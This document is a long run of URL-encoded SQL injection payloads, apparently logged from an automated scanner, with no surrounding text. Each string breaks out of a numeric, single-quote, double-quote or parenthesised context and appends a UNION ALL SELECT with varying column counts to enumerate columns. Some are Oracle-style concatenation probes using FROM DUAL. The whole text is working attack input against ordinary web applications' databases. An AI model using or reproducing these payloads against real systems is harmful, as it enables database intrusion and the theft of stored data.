-1207%22%29%20WHERE%205651%3D5651%20UNION%20ALL%20SELECT%205651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%2C5651%23 -6909%29%20WHERE%202501%3D2501%20UNION%20ALL%20SELECT%202501%2C2501%2C2501%2C2501%2C2501%2C2501%2C2501%2C2501%2C2501%2C2501%2C2501%2C2501%2C2501%2C2501%2C2501%2C2501%2C2501%2C2501%2C2501%2C2501%2C2501%2C2501%2C2501%2C2501%2C2501%2C2501%2C2501%2C2501%2C2501%2C2501%2C2501%2C2501%2C2501%2C2501%2C2501%2C2501%2C2501%2C2501%2C2501%2C2501%2C2501%23 -6892%29%20WHERE%206995%3D6995%20UNION%20ALL%20SELECT%206995%2C6995%2C6995%2C6995%2C6995%2C6995%2C6995%2C6995%2C6995%2C6995%2C6995%2C6995%2C6995%2C6995%2C6995%2C6995%2C6995%2C6995%2C6995%2C6995%2C6995%2C6995%2C6995%2C6995%2C6995%2C6995%2C6995%2C6995%2C6995%2C6995%2C6995%2C6995%2C6995%2C6995%2C6995%2C6995%2C6995%2C6995%2C6995%2C6995%2C6995%2C6995%23 -9235%29%20WHERE%201547%3D1547%20UNION%20ALL%20SELECT%201547%2C1547%2C1547%2C1547%2C1547%2C1547%2C1547%2C1547%2C1547%2C1547%2C1547%2C1547%2C1547%2C1547%2C1547%2C1547%2C1547%2C1547%2C1547%2C1547%2C1547%2C1547%2C1547%2C1547%2C1547%2C1547%2C1547%2C1547%2C1547%2C1547%2C1547%2C1547%2C1547%2C1547%2C1547%2C1547%2C1547%2C1547%2C1547%2C1547%2C1547%2C1547%2C1547%23 -4898%29%20WHERE%201625%3D1625%20UNION%20ALL%20SELECT%201625%2C1625%2C1625%2C1625%2C1625%2C1625%2C1625%2C1625%2C1625%2C1625%2C1625%2C1625%2C1625%2C1625%2C1625%2C1625%2C1625%2C1625%2C1625%2C1625%2C1625%2C1625%2C1625%2C1625%2C1625%2C1625%2C1625%2C1625%2C1625%2C1625%2C1625%2C1625%2C1625%2C1625%2C1625%2C1625%2C1625%2C1625%2C1625%2C1625%2C1625%2C1625%2C1625%2C1625%23 -3498%29%20WHERE%209248%3D9248%20UNION%20ALL%20SELECT%209248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%23 -2252%29%20WHERE%201120%3D1120%20UNION%20ALL%20SELECT%201120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%23 -3402%29%20WHERE%202904%3D2904%20UNION%20ALL%20SELECT%202904%2C2904%2C2904%2C2904%2C2904%2C2904%2C2904%2C2904%2C2904%2C2904%2C2904%2C2904%2C2904%2C2904%2C2904%2C2904%2C2904%2C2904%2C2904%2C2904%2C2904%2C2904%2C2904%2C2904%2C2904%2C2904%2C2904%2C2904%2C2904%2C2904%2C2904%2C2904%2C2904%2C2904%2C2904%2C2904%2C2904%2C2904%2C2904%2C2904%2C2904%2C2904%2C2904%2C2904%2C2904%2C2904%2C2904%23 -1661%29%20WHERE%209756%3D9756%20UNION%20ALL%20SELECT%209756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%23 -1482%29%20WHERE%207492%3D7492%20UNION%20ALL%20SELECT%207492%2C7492%2C7492%2C7492%2C7492%2C7492%2C7492%2C7492%2C7492%2C7492%2C7492%2C7492%2C7492%2C7492%2C7492%2C7492%2C7492%2C7492%2C7492%2C7492%2C7492%2C7492%2C7492%2C7492%2C7492%2C7492%2C7492%2C7492%2C7492%2C7492%2C7492%2C7492%2C7492%2C7492%2C7492%2C7492%2C7492%2C7492%2C7492%2C7492%2C7492%2C7492%2C7492%2C7492%2C7492%2C7492%2C7492%2C7492%2C7492%23 -9989%29%20WHERE%208780%3D8780%20UNION%20ALL%20SELECT%208780%2C8780%2C8780%2C8780%2C8780%2C8780%2C8780%2C8780%2C8780%2C8780%2C8780%2C8780%2C8780%2C8780%2C8780%2C8780%2C8780%2C8780%2C8780%2C8780%2C8780%2C8780%2C8780%2C8780%2C8780%2C8780%2C8780%2C8780%2C8780%2C8780%2C8780%2C8780%2C8780%2C8780%2C8780%2C8780%2C8780%2C8780%2C8780%2C8780%2C8780%2C8780%2C8780%2C8780%2C8780%2C8780%2C8780%2C8780%2C8780%2C8780%23 -5482%27%20WHERE%202182%3D2182%20UNION%20ALL%20SELECT%202182%2C2182%2C2182%2C2182%2C2182%2C2182%2C2182%2C2182%2C2182%2C2182%2C2182%2C2182%2C2182%2C2182%2C2182%2C2182%2C2182%2C2182%2C2182%2C2182%2C2182%2C2182%2C2182%2C2182%2C2182%2C2182%2C2182%2C2182%2C2182%2C2182%2C2182%2C2182%2C2182%2C2182%2C2182%2C2182%2C2182%2C2182%2C2182%2C2182%2C2182%23 -4534%27%20WHERE%201068%3D1068%20UNION%20ALL%20SELECT%201068%2C1068%2C1068%2C1068%2C1068%2C1068%2C1068%2C1068%2C1068%2C1068%2C1068%2C1068%2C1068%2C1068%2C1068%2C1068%2C1068%2C1068%2C1068%2C1068%2C1068%2C1068%2C1068%2C1068%2C1068%2C1068%2C1068%2C1068%2C1068%2C1068%2C1068%2C1068%2C1068%2C1068%2C1068%2C1068%2C1068%2C1068%2C1068%2C1068%2C1068%2C1068%23 -6230%27%20WHERE%206458%3D6458%20UNION%20ALL%20SELECT%206458%2C6458%2C6458%2C6458%2C6458%2C6458%2C6458%2C6458%2C6458%2C6458%2C6458%2C6458%2C6458%2C6458%2C6458%2C6458%2C6458%2C6458%2C6458%2C6458%2C6458%2C6458%2C6458%2C6458%2C6458%2C6458%2C6458%2C6458%2C6458%2C6458%2C6458%2C6458%2C6458%2C6458%2C6458%2C6458%2C6458%2C6458%2C6458%2C6458%2C6458%2C6458%2C6458%23 -8116%27%20WHERE%201725%3D1725%20UNION%20ALL%20SELECT%201725%2C1725%2C1725%2C1725%2C1725%2C1725%2C1725%2C1725%2C1725%2C1725%2C1725%2C1725%2C1725%2C1725%2C1725%2C1725%2C1725%2C1725%2C1725%2C1725%2C1725%2C1725%2C1725%2C1725%2C1725%2C1725%2C1725%2C1725%2C1725%2C1725%2C1725%2C1725%2C1725%2C1725%2C1725%2C1725%2C1725%2C1725%2C1725%2C1725%2C1725%2C1725%2C1725%2C1725%23 -5608%27%20WHERE%205906%3D5906%20UNION%20ALL%20SELECT%205906%2C5906%2C5906%2C5906%2C5906%2C5906%2C5906%2C5906%2C5906%2C5906%2C5906%2C5906%2C5906%2C5906%2C5906%2C5906%2C5906%2C5906%2C5906%2C5906%2C5906%2C5906%2C5906%2C5906%2C5906%2C5906%2C5906%2C5906%2C5906%2C5906%2C5906%2C5906%2C5906%2C5906%2C5906%2C5906%2C5906%2C5906%2C5906%2C5906%2C5906%2C5906%2C5906%2C5906%2C5906%23 -3183%27%20WHERE%209063%3D9063%20UNION%20ALL%20SELECT%209063%2C9063%2C9063%2C9063%2C9063%2C9063%2C9063%2C9063%2C9063%2C9063%2C9063%2C9063%2C9063%2C9063%2C9063%2C9063%2C9063%2C9063%2C9063%2C9063%2C9063%2C9063%2C9063%2C9063%2C9063%2C9063%2C9063%2C9063%2C9063%2C9063%2C9063%2C9063%2C9063%2C9063%2C9063%2C9063%2C9063%2C9063%2C9063%2C9063%2C9063%2C9063%2C9063%2C9063%2C9063%2C9063%23 -2079%27%20WHERE%202554%3D2554%20UNION%20ALL%20SELECT%202554%2C2554%2C2554%2C2554%2C2554%2C2554%2C2554%2C2554%2C2554%2C2554%2C2554%2C2554%2C2554%2C2554%2C2554%2C2554%2C2554%2C2554%2C2554%2C2554%2C2554%2C2554%2C2554%2C2554%2C2554%2C2554%2C2554%2C2554%2C2554%2C2554%2C2554%2C2554%2C2554%2C2554%2C2554%2C2554%2C2554%2C2554%2C2554%2C2554%2C2554%2C2554%2C2554%2C2554%2C2554%2C2554%2C2554%23 -3429%27%20WHERE%208623%3D8623%20UNION%20ALL%20SELECT%208623%2C8623%2C8623%2C8623%2C8623%2C8623%2C8623%2C8623%2C8623%2C8623%2C8623%2C8623%2C8623%2C8623%2C8623%2C8623%2C8623%2C8623%2C8623%2C8623%2C8623%2C8623%2C8623%2C8623%2C8623%2C8623%2C8623%2C8623%2C8623%2C8623%2C8623%2C8623%2C8623%2C8623%2C8623%2C8623%2C8623%2C8623%2C8623%2C8623%2C8623%2C8623%2C8623%2C8623%2C8623%2C8623%2C8623%2C8623%23 -1406%27%20WHERE%204340%3D4340%20UNION%20ALL%20SELECT%204340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%23 -9947%27%20WHERE%204650%3D4650%20UNION%20ALL%20SELECT%204650%2C4650%2C4650%2C4650%2C4650%2C4650%2C4650%2C4650%2C4650%2C4650%2C4650%2C4650%2C4650%2C4650%2C4650%2C4650%2C4650%2C4650%2C4650%2C4650%2C4650%2C4650%2C4650%2C4650%2C4650%2C4650%2C4650%2C4650%2C4650%2C4650%2C4650%2C4650%2C4650%2C4650%2C4650%2C4650%2C4650%2C4650%2C4650%2C4650%2C4650%2C4650%2C4650%2C4650%2C4650%2C4650%2C4650%2C4650%2C4650%2C4650%23 -9431%22%20WHERE%209244%3D9244%20UNION%20ALL%20SELECT%209244%2C9244%2C9244%2C9244%2C9244%2C9244%2C9244%2C9244%2C9244%2C9244%2C9244%2C9244%2C9244%2C9244%2C9244%2C9244%2C9244%2C9244%2C9244%2C9244%2C9244%2C9244%2C9244%2C9244%2C9244%2C9244%2C9244%2C9244%2C9244%2C9244%2C9244%2C9244%2C9244%2C9244%2C9244%2C9244%2C9244%2C9244%2C9244%2C9244%2C9244%23 -3634%22%20WHERE%208434%3D8434%20UNION%20ALL%20SELECT%208434%2C8434%2C8434%2C8434%2C8434%2C8434%2C8434%2C8434%2C8434%2C8434%2C8434%2C8434%2C8434%2C8434%2C8434%2C8434%2C8434%2C8434%2C8434%2C8434%2C8434%2C8434%2C8434%2C8434%2C8434%2C8434%2C8434%2C8434%2C8434%2C8434%2C8434%2C8434%2C8434%2C8434%2C8434%2C8434%2C8434%2C8434%2C8434%2C8434%2C8434%2C8434%23 -7062%22%20WHERE%205160%3D5160%20UNION%20ALL%20SELECT%205160%2C5160%2C5160%2C5160%2C5160%2C5160%2C5160%2C5160%2C5160%2C5160%2C5160%2C5160%2C5160%2C5160%2C5160%2C5160%2C5160%2C5160%2C5160%2C5160%2C5160%2C5160%2C5160%2C5160%2C5160%2C5160%2C5160%2C5160%2C5160%2C5160%2C5160%2C5160%2C5160%2C5160%2C5160%2C5160%2C5160%2C5160%2C5160%2C5160%2C5160%2C5160%2C5160%23 -1678%22%20WHERE%204293%3D4293%20UNION%20ALL%20SELECT%204293%2C4293%2C4293%2C4293%2C4293%2C4293%2C4293%2C4293%2C4293%2C4293%2C4293%2C4293%2C4293%2C4293%2C4293%2C4293%2C4293%2C4293%2C4293%2C4293%2C4293%2C4293%2C4293%2C4293%2C4293%2C4293%2C4293%2C4293%2C4293%2C4293%2C4293%2C4293%2C4293%2C4293%2C4293%2C4293%2C4293%2C4293%2C4293%2C4293%2C4293%2C4293%2C4293%2C4293%23 -8797%22%20WHERE%208190%3D8190%20UNION%20ALL%20SELECT%208190%2C8190%2C8190%2C8190%2C8190%2C8190%2C8190%2C8190%2C8190%2C8190%2C8190%2C8190%2C8190%2C8190%2C8190%2C8190%2C8190%2C8190%2C8190%2C8190%2C8190%2C8190%2C8190%2C8190%2C8190%2C8190%2C8190%2C8190%2C8190%2C8190%2C8190%2C8190%2C8190%2C8190%2C8190%2C8190%2C8190%2C8190%2C8190%2C8190%2C8190%2C8190%2C8190%2C8190%2C8190%23 -5344%22%20WHERE%204180%3D4180%20UNION%20ALL%20SELECT%204180%2C4180%2C4180%2C4180%2C4180%2C4180%2C4180%2C4180%2C4180%2C4180%2C4180%2C4180%2C4180%2C4180%2C4180%2C4180%2C4180%2C4180%2C4180%2C4180%2C4180%2C4180%2C4180%2C4180%2C4180%2C4180%2C4180%2C4180%2C4180%2C4180%2C4180%2C4180%2C4180%2C4180%2C4180%2C4180%2C4180%2C4180%2C4180%2C4180%2C4180%2C4180%2C4180%2C4180%2C4180%2C4180%23 -9829%22%20WHERE%209932%3D9932%20UNION%20ALL%20SELECT%209932%2C9932%2C9932%2C9932%2C9932%2C9932%2C9932%2C9932%2C9932%2C9932%2C9932%2C9932%2C9932%2C9932%2C9932%2C9932%2C9932%2C9932%2C9932%2C9932%2C9932%2C9932%2C9932%2C9932%2C9932%2C9932%2C9932%2C9932%2C9932%2C9932%2C9932%2C9932%2C9932%2C9932%2C9932%2C9932%2C9932%2C9932%2C9932%2C9932%2C9932%2C9932%2C9932%2C9932%2C9932%2C9932%2C9932%23 -6127%22%20WHERE%207509%3D7509%20UNION%20ALL%20SELECT%207509%2C7509%2C7509%2C7509%2C7509%2C7509%2C7509%2C7509%2C7509%2C7509%2C7509%2C7509%2C7509%2C7509%2C7509%2C7509%2C7509%2C7509%2C7509%2C7509%2C7509%2C7509%2C7509%2C7509%2C7509%2C7509%2C7509%2C7509%2C7509%2C7509%2C7509%2C7509%2C7509%2C7509%2C7509%2C7509%2C7509%2C7509%2C7509%2C7509%2C7509%2C7509%2C7509%2C7509%2C7509%2C7509%2C7509%2C7509%23 -5525%22%20WHERE%207115%3D7115%20UNION%20ALL%20SELECT%207115%2C7115%2C7115%2C7115%2C7115%2C7115%2C7115%2C7115%2C7115%2C7115%2C7115%2C7115%2C7115%2C7115%2C7115%2C7115%2C7115%2C7115%2C7115%2C7115%2C7115%2C7115%2C7115%2C7115%2C7115%2C7115%2C7115%2C7115%2C7115%2C7115%2C7115%2C7115%2C7115%2C7115%2C7115%2C7115%2C7115%2C7115%2C7115%2C7115%2C7115%2C7115%2C7115%2C7115%2C7115%2C7115%2C7115%2C7115%2C7115%23 -9184%22%20WHERE%205939%3D5939%20UNION%20ALL%20SELECT%205939%2C5939%2C5939%2C5939%2C5939%2C5939%2C5939%2C5939%2C5939%2C5939%2C5939%2C5939%2C5939%2C5939%2C5939%2C5939%2C5939%2C5939%2C5939%2C5939%2C5939%2C5939%2C5939%2C5939%2C5939%2C5939%2C5939%2C5939%2C5939%2C5939%2C5939%2C5939%2C5939%2C5939%2C5939%2C5939%2C5939%2C5939%2C5939%2C5939%2C5939%2C5939%2C5939%2C5939%2C5939%2C5939%2C5939%2C5939%2C5939%2C5939%23 -3850%20WHERE%203328%3D3328%20UNION%20ALL%20SELECT%203328%2C3328%2C3328%2C3328%2C3328%2C3328%2C3328%2C3328%2C3328%2C3328%2C3328%2C3328%2C3328%2C3328%2C3328%2C3328%2C3328%2C3328%2C3328%2C3328%2C3328%2C3328%2C3328%2C3328%2C3328%2C3328%2C3328%2C3328%2C3328%2C3328%2C3328%2C3328%2C3328%2C3328%2C3328%2C3328%2C3328%2C3328%2C3328%2C3328%2C3328%23 -4070%20WHERE%203023%3D3023%20UNION%20ALL%20SELECT%203023%2C3023%2C3023%2C3023%2C3023%2C3023%2C3023%2C3023%2C3023%2C3023%2C3023%2C3023%2C3023%2C3023%2C3023%2C3023%2C3023%2C3023%2C3023%2C3023%2C3023%2C3023%2C3023%2C3023%2C3023%2C3023%2C3023%2C3023%2C3023%2C3023%2C3023%2C3023%2C3023%2C3023%2C3023%2C3023%2C3023%2C3023%2C3023%2C3023%2C3023%2C3023%23 -4214%20WHERE%209706%3D9706%20UNION%20ALL%20SELECT%209706%2C9706%2C9706%2C9706%2C9706%2C9706%2C9706%2C9706%2C9706%2C9706%2C9706%2C9706%2C9706%2C9706%2C9706%2C9706%2C9706%2C9706%2C9706%2C9706%2C9706%2C9706%2C9706%2C9706%2C9706%2C9706%2C9706%2C9706%2C9706%2C9706%2C9706%2C9706%2C9706%2C9706%2C9706%2C9706%2C9706%2C9706%2C9706%2C9706%2C9706%2C9706%2C9706%23 -3832%20WHERE%207031%3D7031%20UNION%20ALL%20SELECT%207031%2C7031%2C7031%2C7031%2C7031%2C7031%2C7031%2C7031%2C7031%2C7031%2C7031%2C7031%2C7031%2C7031%2C7031%2C7031%2C7031%2C7031%2C7031%2C7031%2C7031%2C7031%2C7031%2C7031%2C7031%2C7031%2C7031%2C7031%2C7031%2C7031%2C7031%2C7031%2C7031%2C7031%2C7031%2C7031%2C7031%2C7031%2C7031%2C7031%2C7031%2C7031%2C7031%2C7031%23 -2670%20WHERE%202900%3D2900%20UNION%20ALL%20SELECT%202900%2C2900%2C2900%2C2900%2C2900%2C2900%2C2900%2C2900%2C2900%2C2900%2C2900%2C2900%2C2900%2C2900%2C2900%2C2900%2C2900%2C2900%2C2900%2C2900%2C2900%2C2900%2C2900%2C2900%2C2900%2C2900%2C2900%2C2900%2C2900%2C2900%2C2900%2C2900%2C2900%2C2900%2C2900%2C2900%2C2900%2C2900%2C2900%2C2900%2C2900%2C2900%2C2900%2C2900%2C2900%23 -1125%20WHERE%208800%3D8800%20UNION%20ALL%20SELECT%208800%2C8800%2C8800%2C8800%2C8800%2C8800%2C8800%2C8800%2C8800%2C8800%2C8800%2C8800%2C8800%2C8800%2C8800%2C8800%2C8800%2C8800%2C8800%2C8800%2C8800%2C8800%2C8800%2C8800%2C8800%2C8800%2C8800%2C8800%2C8800%2C8800%2C8800%2C8800%2C8800%2C8800%2C8800%2C8800%2C8800%2C8800%2C8800%2C8800%2C8800%2C8800%2C8800%2C8800%2C8800%2C8800%23 -9969%20WHERE%203875%3D3875%20UNION%20ALL%20SELECT%203875%2C3875%2C3875%2C3875%2C3875%2C3875%2C3875%2C3875%2C3875%2C3875%2C3875%2C3875%2C3875%2C3875%2C3875%2C3875%2C3875%2C3875%2C3875%2C3875%2C3875%2C3875%2C3875%2C3875%2C3875%2C3875%2C3875%2C3875%2C3875%2C3875%2C3875%2C3875%2C3875%2C3875%2C3875%2C3875%2C3875%2C3875%2C3875%2C3875%2C3875%2C3875%2C3875%2C3875%2C3875%2C3875%2C3875%23 -6696%20WHERE%201411%3D1411%20UNION%20ALL%20SELECT%201411%2C1411%2C1411%2C1411%2C1411%2C1411%2C1411%2C1411%2C1411%2C1411%2C1411%2C1411%2C1411%2C1411%2C1411%2C1411%2C1411%2C1411%2C1411%2C1411%2C1411%2C1411%2C1411%2C1411%2C1411%2C1411%2C1411%2C1411%2C1411%2C1411%2C1411%2C1411%2C1411%2C1411%2C1411%2C1411%2C1411%2C1411%2C1411%2C1411%2C1411%2C1411%2C1411%2C1411%2C1411%2C1411%2C1411%2C1411%23 -7014%20WHERE%205592%3D5592%20UNION%20ALL%20SELECT%205592%2C5592%2C5592%2C5592%2C5592%2C5592%2C5592%2C5592%2C5592%2C5592%2C5592%2C5592%2C5592%2C5592%2C5592%2C5592%2C5592%2C5592%2C5592%2C5592%2C5592%2C5592%2C5592%2C5592%2C5592%2C5592%2C5592%2C5592%2C5592%2C5592%2C5592%2C5592%2C5592%2C5592%2C5592%2C5592%2C5592%2C5592%2C5592%2C5592%2C5592%2C5592%2C5592%2C5592%2C5592%2C5592%2C5592%2C5592%2C5592%23 -2567%20WHERE%208606%3D8606%20UNION%20ALL%20SELECT%208606%2C8606%2C8606%2C8606%2C8606%2C8606%2C8606%2C8606%2C8606%2C8606%2C8606%2C8606%2C8606%2C8606%2C8606%2C8606%2C8606%2C8606%2C8606%2C8606%2C8606%2C8606%2C8606%2C8606%2C8606%2C8606%2C8606%2C8606%2C8606%2C8606%2C8606%2C8606%2C8606%2C8606%2C8606%2C8606%2C8606%2C8606%2C8606%2C8606%2C8606%2C8606%2C8606%2C8606%2C8606%2C8606%2C8606%2C8606%2C8606%2C8606%23 -4875%27%7C%7C%28SELECT%20%27caEY%27%20FROM%20DUAL%20WHERE%208313%3D8313%20UNION%20ALL%20SELECT%208313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%23 -3790%27%7C%7C%28SELECT%20%27ZFSc%27%20FROM%20DUAL%20WHERE%203709%3D3709%20UNION%20ALL%20SELECT%203709%2C3709%2C3709%2C3709%2C3709%2C3709%2C3709%2C3709%2C3709%2C3709%2C3709%2C3709%2C3709%2C3709%2C3709%2C3709%2C3709%2C3709%2C3709%2C3709%2C3709%2C3709%2C3709%2C3709%2C3709%2C3709%2C3709%2C3709%2C3709%2C3709%2C3709%2C3709%2C3709%2C3709%2C3709%2C3709%2C3709%2C3709%2C3709%2C3709%2C3709%2C3709%23 -5389%27%7C%7C%28SELECT%20%27QUvJ%27%20FROM%20DUAL%20WHERE%208529%3D8529%20UNION%20ALL%20SELECT%208529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%23 -2364%27%7C%7C%28SELECT%20%27Vchb%27%20FROM%20DUAL%20WHERE%202246%3D2246%20UNION%20ALL%20SELECT%202246%2C2246%2C2246%2C2246%2C2246%2C2246%2C2246%2C2246%2C2246%2C2246%2C2246%2C2246%2C2246%2C2246%2C2246%2C2246%2C2246%2C2246%2C2246%2C2246%2C2246%2C2246%2C2246%2C2246%2C2246%2C2246%2C2246%2C2246%2C2246%2C2246%2C2246%2C2246%2C2246%2C2246%2C2246%2C2246%2C2246%2C2246%2C2246%2C2246%2C2246%2C2246%2C2246%2C2246%23 -1239%27%7C%7C%28SELECT%20%27DAVz%27%20FROM%20DUAL%20WHERE%209224%3D9224%20UNION%20ALL%20SELECT%209224%2C9224%2C9224%2C9224%2C9224%2C9224%2C9224%2C9224%2C9224%2C9224%2C9224%2C9224%2C9224%2C9224%2C9224%2C9224%2C9224%2C9224%2C9224%2C9224%2C9224%2C9224%2C9224%2C9224%2C9224%2C9224%2C9224%2C9224%2C9224%2C9224%2C9224%2C9224%2C9224%2C9224%2C9224%2C9224%2C9224%2C9224%2C9224%2C9224%2C9224%2C9224%2C9224%2C9224%2C9224%23 -4776%27%7C%7C%28SELECT%20%27NoBv%27%20FROM%20DUAL%20WHERE%208560%3D8560%20UNION%20ALL%20SELECT%208560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%23 -9778%27%7C%7C%28SELECT%20%27uXNx%27%20FROM%20DUAL%20WHERE%203758%3D3758%20UNION%20ALL%20SELECT%203758%2C3758%2C3758%2C3758%2C3758%2C3758%2C3758%2C3758%2C3758%2C3758%2C3758%2C3758%2C3758%2C3758%2C3758%2C3758%2C3758%2C3758%2C3758%2C3758%2C3758%2C3758%2C3758%2C3758%2C3758%2C3758%2C3758%2C3758%2C3758%2C3758%2C3758%2C3758%2C3758%2C3758%2C3758%2C3758%2C3758%2C3758%2C3758%2C3758%2C3758%2C3758%2C3758%2C3758%2C3758%2C3758%2C3758%23 -5158%27%7C%7C%28SELECT%20%27AfGn%27%20FROM%20DUAL%20WHERE%208109%3D8109%20UNION%20ALL%20SELECT%208109%2C8109%2C8109%2C8109%2C8109%2C8109%2C8109%2C8109%2C8109%2C8109%2C8109%2C8109%2C8109%2C8109%2C8109%2C8109%2C8109%2C8109%2C8109%2C8109%2C8109%2C8109%2C8109%2C8109%2C8109%2C8109%2C8109%2C8109%2C8109%2C8109%2C8109%2C8109%2C8109%2C8109%2C8109%2C8109%2C8109%2C8109%2C8109%2C8109%2C8109%2C8109%2C8109%2C8109%2C8109%2C8109%2C8109%2C8109%23 -7993%27%7C%7C%28SELECT%20%27Piko%27%20FROM%20DUAL%20WHERE%205930%3D5930%20UNION%20ALL%20SELECT%205930%2C5930%2C5930%2C5930%2C5930%2C5930%2C5930%2C5930%2C5930%2C5930%2C5930%2C5930%2C5930%2C5930%2C5930%2C5930%2C5930%2C5930%2C5930%2C5930%2C5930%2C5930%2C5930%2C5930%2C5930%2C5930%2C5930%2C5930%2C5930%2C5930%2C5930%2C5930%2C5930%2C5930%2C5930%2C5930%2C5930%2C5930%2C5930%2C5930%2C5930%2C5930%2C5930%2C5930%2C5930%2C5930%2C5930%2C5930%2C5930%23 -8522%27%7C%7C%28SELECT%20%27ksnO%27%20FROM%20DUAL%20WHERE%202018%3D2018%20UNION%20ALL%20SELECT%202018%2C2018%2C2018%2C2018%2C2018%2C2018%2C2018%2C2018%2C2018%2C2018%2C2018%2C2018%2C2018%2C2018%2C2018%2C2018%2C2018%2C2018%2C2018%2C2018%2C2018%2C2018%2C2018%2C2018%2C2018%2C2018%2C2018%2C2018%2C2018%2C2018%2C2018%2C2018%2C2018%2C2018%2C2018%2C2018%2C2018%2C2018%2C2018%2C2018%2C2018%2C2018%2C2018%2C2018%2C2018%2C2018%2C2018%2C2018%2C2018%2C2018%23 -8073%27%7C%7C%28SELECT%20%27yMQQ%27%20WHERE%209618%3D9618%20UNION%20ALL%20SELECT%209618%2C9618%2C9618%2C9618%2C9618%2C9618%2C9618%2C9618%2C9618%2C9618%2C9618%2C9618%2C9618%2C9618%2C9618%2C9618%2C9618%2C9618%2C9618%2C9618%2C9618%2C9618%2C9618%2C9618%2C9618%2C9618%2C9618%2C9618%2C9618%2C9618%2C9618%2C9618%2C9618%2C9618%2C9618%2C9618%2C9618%2C9618%2C9618%2C9618%2C9618%23 -1700%27%7C%7C%28SELECT%20%27vtik%27%20WHERE%205567%3D5567%20UNION%20ALL%20SELECT%205567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%23 -2790%27%7C%7C%28SELECT%20%27SoJz%27%20WHERE%204559%3D4559%20UNION%20ALL%20SELECT%204559%2C4559%2C4559%2C4559%2C4559%2C4559%2C4559%2C4559%2C4559%2C4559%2C4559%2C4559%2C4559%2C4559%2C4559%2C4559%2C4559%2C4559%2C4559%2C4559%2C4559%2C4559%2C4559%2C4559%2C4559%2C4559%2C4559%2C4559%2C4559%2C4559%2C4559%2C4559%2C4559%2C4559%2C4559%2C4559%2C4559%2C4559%2C4559%2C4559%2C4559%2C4559%2C4559%23 -1233%27%7C%7C%28SELECT%20%27WhHF%27%20WHERE%201689%3D1689%20UNION%20ALL%20SELECT%201689%2C1689%2C1689%2C1689%2C1689%2C1689%2C1689%2C1689%2C1689%2C1689%2C1689%2C1689%2C1689%2C1689%2C1689%2C1689%2C1689%2C1689%2C1689%2C1689%2C1689%2C1689%2C1689%2C1689%2C1689%2C1689%2C1689%2C1689%2C1689%2C1689%2C1689%2C1689%2C1689%2C1689%2C1689%2C1689%2C1689%2C1689%2C1689%2C1689%2C1689%2C1689%2C1689%2C1689%23 